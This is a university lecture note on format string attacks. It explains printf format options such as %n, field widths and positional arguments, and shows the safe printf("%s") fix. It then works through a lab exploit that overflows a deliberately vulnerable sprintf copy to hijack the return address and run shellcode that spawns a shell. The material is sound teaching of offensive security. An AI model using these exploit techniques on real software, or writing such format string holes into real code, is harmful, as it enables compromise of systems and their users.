SI485H: Stack Based Binary Exploits and Defenses (F15)


Lec. 19: Format String Attacks 1

1 Format String Attacks

A format string attack is an alternate way of exploiting a program that doesn't necessarily require smashing the stack. Instead, it leverages the format characters in a format string to generate excessive data, read from arbitrary memory, or write to arbitrary memory.

At the heart of a format string attack is a casual programming error regarding format strings that allows the user to provide the format string portion, not just the arguments to the format. For example:

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char * argv[]){

  printf(argv[1]); // user controls the format
  printf("\n");
}

In this program, the user provides the format portion of the printf(). For ordinary input, that makes no visible difference:

user@si485H-base:demo$ ./format_error "Hello World"
Hello World
user@si485H-base:demo$ ./format_error "Go Navy"
Go Navy
user@si485H-base:demo$ ./format_error "%x"
b7fff000

However, notice what happens when you give it a format character, i.e., one that starts with a '%'. The format character is interpreted even though no matching argument was passed, so printf() prints whatever value sits where that argument would have been: here, a value read off the stack that happens to be an address. What if we were to give it something longer? What if we were to give it something that would cause a memory address to be dereferenced, like a '%s':

user@si485H-base:demo$ ./format_error "%s.%s.%s.%s.%s.%s.%s"
4.??u?.UW1?VS???????unull).(null).?$?U?
user@si485H-base:demo$ ./format_error "%s.%s.%s.%s.%s.%s.%s.%s"
Segmentation fault (core dumped)

We can actually get the program to crash, and from what we've seen so far, getting the program to crash is usually the first step towards exploiting the program, which is what we'll eventually do.
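The usual repair for this kind of error is to keep the format string constant and pass the user's text only as an argument. Here is a minimal sketch of that idea, assuming a helper named format_untrusted() (a hypothetical name, not part of the lecture code) that formats into a caller-supplied buffer:

```c
#include <stdio.h>

/* Hypothetical helper (not from the lecture code): format untrusted text
 * through a constant "%s" format, so any '%' in it is copied literally. */
int format_untrusted(char *out, size_t outsz, const char *untrusted)
{
    /* The format is a fixed literal; the user's text is only an argument. */
    return snprintf(out, outsz, "%s", untrusted);
}
```

In format_error.c the same effect comes from writing printf("%s", argv[1]) in place of printf(argv[1]); an input such as "%s.%s.%x" is then printed as is instead of being interpreted.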

2 Uncommon Formats and Format Options

In order to fully leverage the power of the format, we need to review the full list of formats and format options. You should refer to the manual page, man 3 printf, for all the details.

2.1 %n : Saving the Number of Bytes

The printf() family of functions allows you to save the total number of bytes formatted so far into a variable. There is a decent chance you've never heard of this format, but it is surprisingly useful for certain tasks. For example, given a format and its arguments, it is not obvious how long the output will be until it is actually formatted.

Here's a basic example of using %n:

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[]){
  int count_one, count_two;

  printf("The number of bytes written up to this point X%n is being stored in count_one, "
         "and the number of bytes up to here X%n is being stored in count_two.\n",
         &count_one,&count_two);

  printf("count_one: %d\n", count_one);
  printf("count_two: %d\n", count_two);

  return 0;
}

The %n format matches an address, in particular the address of an integer, at which the number of bytes formatted up to that point is stored. So, for example, running this program, we get:

user@si485H-base:demo$ ./format_n 
The number of bytes written up to this point X is being stored in count_one, and the number of bytes up to here X is being stored in count_two.
count_one: 46
count_two: 113

Note that %n itself produces nothing in the output. It only has a side effect: storing the count.
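The same side effect works when formatting into a buffer. As a small sketch, assuming a hypothetical helper bytes_before_marker() and a made-up "id=...;rest" layout chosen purely for illustration, we can ask how many bytes come before a given point in the output:

```c
#include <stdio.h>

/* Hypothetical helper: how many bytes does "id=<id>;" occupy? */
int bytes_before_marker(int id)
{
    char line[64];
    int before = -1;

    /* %n stores the running byte count in `before` and prints nothing. */
    snprintf(line, sizeof line, "id=%d;%nrest", id, &before);
    return before;
}
```

For an id of 12345, the text before the %n is "id=12345;", so the stored count is 9.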

Ok, so why does this format exist? Well, there are some really practical uses, for example, consider counting the digits of a number read in using scanf():

user@si485H-base:demo$ cat scanf_n.c
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char * argv[]){

  int a,n;

  scanf("%d%n",&a,&n);

  printf("Number: %d Digits: %d\n",a,n);

}
user@si485H-base:demo$ ./scanf_n 
1234567890
Number: 1234567890 Digits: 10

Or, for example, to align text. There are a lot of reasonable reasons to have this format.
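To make the alignment use concrete, here is a hedged sketch, assuming a hypothetical helper mark_value() that writes "key = value" and then places a caret under the first character of the value on the next line. The column comes from %n, and the padding from the standard "%*s" width-from-argument form:

```c
#include <stdio.h>

/* Hypothetical helper: write "key = value" and, on the next line, a caret
 * aligned under the first character of the value. */
void mark_value(char *out, size_t outsz, const char *key, int value)
{
    char line[128];
    int col = 0;

    /* %n records the column at which the value starts. */
    snprintf(line, sizeof line, "%s = %n%d", key, &col, value);

    /* "%*s" with an empty string emits `col` spaces of padding. */
    snprintf(out, outsz, "%s\n%*s^", line, col, "");
}
```

With key "x" and value 42, the first line is "x = 42" and the caret on the second line sits in column 4, directly under the 4.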

2.2 Format Flag and Argument Options

Another tool we will need is some of the extra options that formats provide to better manipulate the output. So far you are fairly familiar with the conversion formats:

  • %d : signed number
  • %u : unsigned number
  • %x : hexadecimal number
  • %f : floating point number
  • %s : string conversion

What you might not be aware of is that there is a wealth of further options to change the formatting. Here's a sample program that will illuminate some of these so-called "flag" options:

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char * argv[]){

  int x = 0xdeadbeef;

  printf("%%d:(%d)\n",x);
  printf("%%u:(%u)\n",x);
  printf("%%x:(%x)\n",x);
  printf("%%#x:(%#x)\n",x);
  printf("%%#50x:(%#50x)\n",x);
  printf("%%#050x:(%#050x)\n",x);
  printf("%%1$#050x %%1$d:(%1$#050x %1$d)\n",x);
  printf("%%1$#050hx %%1$hd:(%1$#050hx %1$hd)\n",x);
  printf("%%1$#050hhx %%1$hhd:(%1$#050hhx %1$hhd)\n",x);

}
user@si485H-base:demo$ ./unusual_formats 
%d:(-559038737)
%u:(3735928559)
%x:(deadbeef)
%#x:(0xdeadbeef)
%#50x:(                                        0xdeadbeef)
%#050x:(0x0000000000000000000000000000000000000000deadbeef)
%1$#050x %1$d:(0x0000000000000000000000000000000000000000deadbeef -559038737)
%1$#050hx %1$hd:(0x00000000000000000000000000000000000000000000beef -16657)
%1$#050hhx %1$hhd:(0x0000000000000000000000000000000000000000000000ef -17)

The first flag option is the "#" which is used to add prefix formatting. In the case of printing in hexadecimal it will add '0x' to the start of non-zero values. That's pretty useful.

The next option is adding a number prior to the conversion character, as in %#50x. This is the field width: the output is right adjusted and padded with spaces so that the whole field, including the 0x prefix, is at least 50 characters wide. If you add a leading 0 to the width, as in %#050x, the format fills those blank spaces with 0's instead.

Perhaps the least familiar option is the m$ form, where m is some number, which allows you to refer to a specific argument being passed. In the example above, we refer to the same argument twice using two different conversion formats. This is really useful for not having to pass the same argument multiple times; however, when you use $ references, you have to use them for every conversion in the format.

Finally, we have the half-conversion option h which says to only convert half the typical size. In this case, since we are working with 4-byte integer values, that would mean to format a 2-byte short size value when using one h, or a single char length 1-byte value with two, hh.
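To see the h and hh truncation in isolation, here is a small sketch that formats the same int at full, half, and quarter size. The helper names as_int(), as_short(), and as_char() are hypothetical and exist only for this illustration:

```c
#include <stdio.h>

/* Hypothetical helpers: format the same int at 4-, 2- and 1-byte size. */
void as_int(char *out, size_t n, int x)
{
    snprintf(out, n, "%x %d", x, x);      /* all 4 bytes */
}

void as_short(char *out, size_t n, int x)
{
    snprintf(out, n, "%hx %hd", x, x);    /* low 2 bytes only */
}

void as_char(char *out, size_t n, int x)
{
    snprintf(out, n, "%hhx %hhd", x, x);  /* low 1 byte only */
}
```

For the value 0xdeadbeef these give "deadbeef -559038737", "beef -16657", and "ef -17": the signed results are what you get when 0xbeef and 0xef are read as a two's complement short and char.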

2.3 Flag Options for Strings

With strings, things are similar but a bit different. Here's some example code:

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char * argv[]){

  char * string = "Go Navy! Beat Army!";

  printf("%%s:(%s)\n",string);
  printf("%%50s:(%50s)\n",string);
  printf("%%.5s:(%.5s)\n",string);
  printf("%%50.5s:(%50.5s)\n",string);
  printf("%%-50.5s:(%-50.5s)\n",string);

}
user@si485H-base:demo$ ./string_formats 
%s:(Go Navy! Beat Army!)
%50s:(                               Go Navy! Beat Army!)
%.5s:(Go Na)
%50.5s:(                                             Go Na)
%-50.5s:(Go Na                                             )

Like with numbers, we can specify a field width to right adjust the string within some minimum size, but we can't fill that with 0's. Instead, the padding is always spaces.

Unlike with integers, where a precision sets a minimum number of digits, a precision on a string truncates it (floating point numbers are cut off at a number of decimal places in a similar way). The number following the . says at most how many bytes from the string should be used, and this can be combined with the right adjustment. And, interestingly, the right adjustment can be flipped to left adjustment with the - flag.
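Both the width and the precision can also be taken from the argument list by writing * in their place, which is handy when the length is only known at run time. A minimal sketch, assuming a hypothetical helper format_prefix():

```c
#include <stdio.h>

/* Hypothetical helper: format at most `len` bytes of `data`, left adjusted
 * in a field of `width` characters and wrapped in brackets. */
int format_prefix(char *out, size_t outsz, const char *data, int len, int width)
{
    /* "-" left adjusts; the first "*" consumes `width` and ".*" consumes
     * `len` (the most bytes that will be read from data). */
    return snprintf(out, outsz, "[%-*.*s]", width, len, data);
}
```

Calling it with "Go Navy! Beat Army!", a length of 5, and a width of 8 produces "[Go Na   ]".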

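While this is all on the output side and you can imagine where it might be super useful, the same width option matters on the input side for overflow protection: in scanf(), the field width limits how many characters are read and written to the target address. Note that the width does not count the terminating NUL byte, so the buffer needs one byte more than the width:

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char * argv[]){

  char string[11]; // 10 characters plus the terminating NUL

  scanf("%10s",string); // reads at most 10 characters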

  printf("%s\n",string);

}
user@si485H-base:demo$ ./scanf_format 
HELLLOOOOOOOOOOOOOOO
HELLLOOOOO
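The same width rule can be checked without typing at a terminal by using sscanf(), which parses from a string instead of standard input. This is a sketch under that substitution, with a hypothetical helper read_word():

```c
#include <stdio.h>

#define WORD_MAX 10   /* most characters we accept in one word */

/* Hypothetical helper: read one whitespace-delimited word of at most
 * WORD_MAX characters from `input` into `word`, which must have room for
 * WORD_MAX + 1 bytes. */
int read_word(const char *input, char word[WORD_MAX + 1])
{
    /* The width in "%10s" counts characters only; sscanf then appends the
     * terminating NUL, hence the extra byte in the buffer. */
    return sscanf(input, "%10s", word);
}
```

Given the 20-character input from the transcript above, only the first 10 characters, HELLLOOOOO, are stored.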

3 Using formats in an exploit

Now that we've had a whirlwind tour of formats you've never heard of nor ever really wanted to use, how can we use them in an exploit? We'll look at one method in this lesson involving stack smashing, but we'll see some other techniques soon.

Here's the program we are going to exploit:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void good(){
  printf("good\n");
}

void bad(){
  printf("bad\n");
}

void vuln(char * str){

  char outbuf[512];
  char buffer[512];

  sprintf (buffer, "ERR Wrong command: %.400s", str);
  sprintf (outbuf, buffer); //<--- used as a silly copy

  printf("outbuf: %s\n", outbuf);

}

int main(int argc, char *argv[]){

  vuln(argv[1]);

}

This is a rather contrived example of using sprintf() to do a copy. You might think that because the first sprintf() uses the %.400s format, neither buffer nor outbuf can overflow. For example, this does not cause a segmentation fault:

user@si485H-base:demo$ ./format_overflow `python -c "print 'A'*1000"`
outbuf: ERR Wrong command: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

True, we can't overflow buffer, but we can overflow outbuf because the second sprintf() treats the contents of buffer as a format string. For example, what if the input was like:

user@si485H-base:demo$ ./format_overflow "%550x"
outbuf: ERR Wrong command:                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               bffff897
Segmentation fault (core dumped)
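To see why five characters of input are enough, we can measure how far such a format expands without writing anything. This is a sketch, assuming a hypothetical helper expanded_length() that uses a fixed format with a width argument as a stand-in for the attacker's "%550x":

```c
#include <stdio.h>

/* Hypothetical helper: number of bytes that "ERR Wrong command: " followed
 * by a hex field of the given width expands to. */
int expanded_length(int width)
{
    /* With a NULL buffer and size 0, snprintf writes nothing and only
     * returns the length the output would have had. */
    return snprintf(NULL, 0, "ERR Wrong command: %*x", width, 0u);
}
```

For a width of 550 this returns 569 (the 19-byte prefix plus 550), well past the 512 bytes reserved for outbuf.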

And if we look at the dmesg output:

user@si485H-base:demo$ dmesg | tail -1
[181031.140058] format_overflow[16736]: segfault at 20202020 ip 20202020 sp bffff6b0 error 14

We see that the saved return address was overwritten with a bunch of 0x20 bytes, or spaces, so that is where the instruction pointer ended up! Now, the goal is to overwrite the return address with something useful, like the address of bad().

user@si485H-base:demo$ objdump -d format_overflow | grep bad
08048481 <bad>:

To do this, we need the right amount of padding in the format so that the bytes following it land exactly on the return address. We can find it by first using 0xdeadbeef as a stand-in and checking the dmesg output:

user@si485H-base:demo$ ./format_overflow "%500d$(printf '\xef\xbe\xad\xde')" > /dev/null ; dmesg | tail -1
Segmentation fault (core dumped)
[181507.663004] format_overflow[16817]: segfault at deadbe ip 08048504 sp bffff6b0 error 4 in format_overflow[8048000+1000]
user@si485H-base:demo$ ./format_overflow "%501d$(printf '\xef\xbe\xad\xde')" > /dev/null ; dmesg | tail -1
Illegal instruction (core dumped)
[181507.663004] format_overflow[16817]: segfault at deadbe ip 08048504 sp bffff6b0 error 4 in format_overflow[8048000+1000]
user@si485H-base:demo$ ./format_overflow "%502d$(printf '\xef\xbe\xad\xde')" > /dev/null ; dmesg | tail -1
Segmentation fault (core dumped)
[181516.038682] format_overflow[16827]: segfault at 80400de ip 080400de sp bffff6b0 error 14 in format_overflow[8048000+1000]
user@si485H-base:demo$ ./format_overflow "%503d$(printf '\xef\xbe\xad\xde')" > /dev/null ; dmesg | tail -1
Segmentation fault (core dumped)
[181519.371290] format_overflow[16832]: segfault at 800dead ip 0800dead sp bffff6b0 error 14 in format_overflow[8048000+1000]
user@si485H-base:demo$ ./format_overflow "%504d$(printf '\xef\xbe\xad\xde')" > /dev/null ; dmesg | tail -1
Segmentation fault (core dumped)
[181522.598268] format_overflow[16837]: segfault at deadbe ip 00deadbe sp bffff6b0 error 14 in format_overflow[8048000+1000]
user@si485H-base:demo$ ./format_overflow "%505d$(printf '\xef\xbe\xad\xde')" > /dev/null ; dmesg | tail -1
Segmentation fault (core dumped)
[181526.367333] format_overflow[16842]: segfault at deadbeef ip deadbeef sp bffff6b0 error 15

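So if we use a 505 byte wide %d format, the next 4 bytes we write land on the return address: the 19-byte "ERR Wrong command: " prefix plus 505 bytes of padding puts them 524 bytes past the start of outbuf. Adding the address of bad() there, we get what we want: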

user@si485H-base:demo$ objdump -d format_overflow | grep bad
08048481 <bad>:
user@si485H-base:demo$ ./format_overflow "%505d$(printf '\x81\x84\x04\x08')" 
outbuf: ERR Wrong command:                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               -1073743725??
bad
Segmentation fault (core dumped)
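The argument passed on the command line above is just a padding format followed by the target address in little-endian byte order. As a sketch of how that string is put together, assuming a hypothetical helper build_payload():

```c
#include <stdint.h>
#include <stdio.h>

/* Hypothetical helper: build "%<pad>d" followed by the 4 bytes of `addr`,
 * least significant byte first, as printf '\x81\x84\x04\x08' does in the
 * shell. A zero byte in `addr` would end the string early. */
int build_payload(char *out, size_t outsz, int pad, uint32_t addr)
{
    return snprintf(out, outsz, "%%%dd%c%c%c%c", pad,
                    (int)(addr & 0xff),
                    (int)((addr >> 8) & 0xff),
                    (int)((addr >> 16) & 0xff),
                    (int)((addr >> 24) & 0xff));
}
```

With a pad of 505 and the address 0x08048481, the result is the 9-byte string "%505d" followed by the bytes 81 84 04 08.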

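We can also get this to execute a shell in the normal way. Note how I adjusted the jump point using dmesg: the first run uses 0xdeadbeef as a placeholder, and the sp value in its crash report (bffff690) points just past the overwritten return address, which is where the shellcode begins.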

user@si485H-base:demo$ ./format_overflow "%505d$(printf '\xef\xbe\xad\xde')$(printf $(./hexify.sh smallest_shell))"
outbuf: ERR Wrong command:                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               -1073743746ᆳ?1???Phn/shh//bi??
                                                                                                                                                                         ̀
Segmentation fault (core dumped)
user@si485H-base:demo$ dmesg | tail -1
[181798.445440] format_overflow[16919]: segfault at deadbeef ip deadbeef sp bffff690 error 15
user@si485H-base:demo$ ./format_overflow "%505d$(printf '\x90\xf6\xff\xbf')$(printf $(./hexify.sh smallest_shell))"
outbuf: ERR Wrong command:                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               -1073743746????1???Phn/shh//bi??
                                                                                                                                                                           ̀
$ echo "I did it!"
I did it!
$